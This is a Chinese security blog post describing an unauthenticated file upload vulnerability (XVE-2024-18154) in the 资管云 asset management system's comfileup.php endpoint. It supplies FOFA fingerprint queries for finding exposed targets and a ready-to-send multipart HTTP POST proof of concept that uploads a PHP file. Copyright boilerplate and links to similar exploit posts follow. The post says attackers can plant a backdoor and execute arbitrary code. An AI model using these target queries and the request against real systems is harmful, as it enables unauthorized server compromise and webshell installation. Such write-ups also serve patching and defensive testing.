资管云comfileup.php前台文件上传漏洞(XVE-2024-18154)

资管云comfileup.php前台文件上传漏洞(XVE-2024-18154)

01027

百易云资产管理运营系统 comfileup.php 接口存在文件上传漏洞,未经身份验证的攻击者通过漏洞上传恶意后门文件,执行任意代码,从而获取到服务器权限。

fofa

body="不要着急,点此"
title="资管云"

poc

POST /comfileup.php HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0)Gecko/20100101 Firefox/127.0
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: cna=JtMCH7NgWFYCAXBg5XNzopCe
Upgrade-Insecure-Requests: 1
Priority: u=1
Content-Type: multipart/form-data; boundary=--------1110146050
Content-Length: 117

----------1110146050
Content-Disposition: form-data; name="file";filename="test.php"

test
----------1110146050--

d2b5ca33bd20241122115555

 

© 版权声明
文章版权声明 1、本网站名称:博明网络
2、本站永久网址:https://www.laoxinsec.com
3、本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长QQ740701843进行删除处理。
4、本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。

THE END
漏洞文库
喜欢就支持一下吧
点赞7 分享
laoxinsec_com的头像|博明网络
紫光电子档案管理系统selectFileRemote存在SQL注入漏洞|博明网络
紫光电子档案管理系统selectFileRemote存在SQL注入漏洞
紫光电子档案管理系统selectFileRemote存在SQL注入漏洞
30天前 62
相关推荐
资管云comfileup.php前台文件上传漏洞(XVE-2024-18154)|博明网络
资管云comfileup.php前台文件上传漏洞(XVE-2024-18154)
资管云comfileup.php前台文件上传漏洞(XVE-2024-18154)
30天前 102
紫光电子档案管理系统selectFileRemote存在SQL注入漏洞|博明网络
紫光电子档案管理系统selectFileRemote存在SQL注入漏洞
紫光电子档案管理系统selectFileRemote存在SQL注入漏洞
30天前 62
1Panel面板最新前台RCE漏洞(CVE-2024-39911)|博明网络
1Panel面板最新前台RCE漏洞(CVE-2024-39911)
1Panel面板最新前台RCE漏洞(CVE-2024-39911)
11天前 59
Apache ActiveMQ远程命令执行漏洞|博明网络
Apache ActiveMQ远程命令执行漏洞
Apache ActiveMQ远程命令执行漏洞
7天前 55
Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767|博明网络
Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767
Adobe-ColdFusion任意文件读取漏洞CVE-2024-20767
11天前 45
AEGON-LIFEv1.0存在SQL注入漏洞(CVE-2024-36597)|博明网络
AEGON-LIFEv1.0存在SQL注入漏洞(CVE-2024-36597)
AEGON-LIFEv1.0存在SQL注入漏洞(CVE-2024-36597)
11天前 44
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称

请填写用户信息:

  • 昵称(必填)
  • 邮箱(必填)
表情
[aoman][baiyan][bishi][bizui][cahan][ciya][dabing][daku][deyi][doge][fadai][fanu][fendou][ganga][guzhang][haixiu][hanxiao][zuohengheng][zhuakuang][zhouma][zhemo][zhayanjian][zaijian][yun][youhengheng][yiwen][yinxian][xu][xieyanxiao][xiaoku][xiaojiujie][xia][wunai][wozuimei][weixiao][weiqu][tuosai][tu][touxiao][tiaopi][shui][se][saorao][qiudale][qinqin][qiaoda][piezui][penxue][nanguo][liulei][liuhan][lenghan][leiben][kun][kuaikule][ku][koubi][kelian][keai][jingya][jingxi][jingkong][jie][huaixiao][haqian][aini][OK][qiang][quantou][shengli][woshou][gouyin][baoquan][aixin][bangbangtang][xiaoyanger][xigua][hexie][pijiu][lanqiu][juhua][hecai][haobang][caidao][baojin][chi][dan][kulou][shuai][shouqiang][yangtuo][youling]
代码

请输入代码:

确认
图片

    暂无评论内容

用户封面
laoxinsec_com的头像|博明网络
紫光电子档案管理系统selectFileRemote存在SQL注入漏洞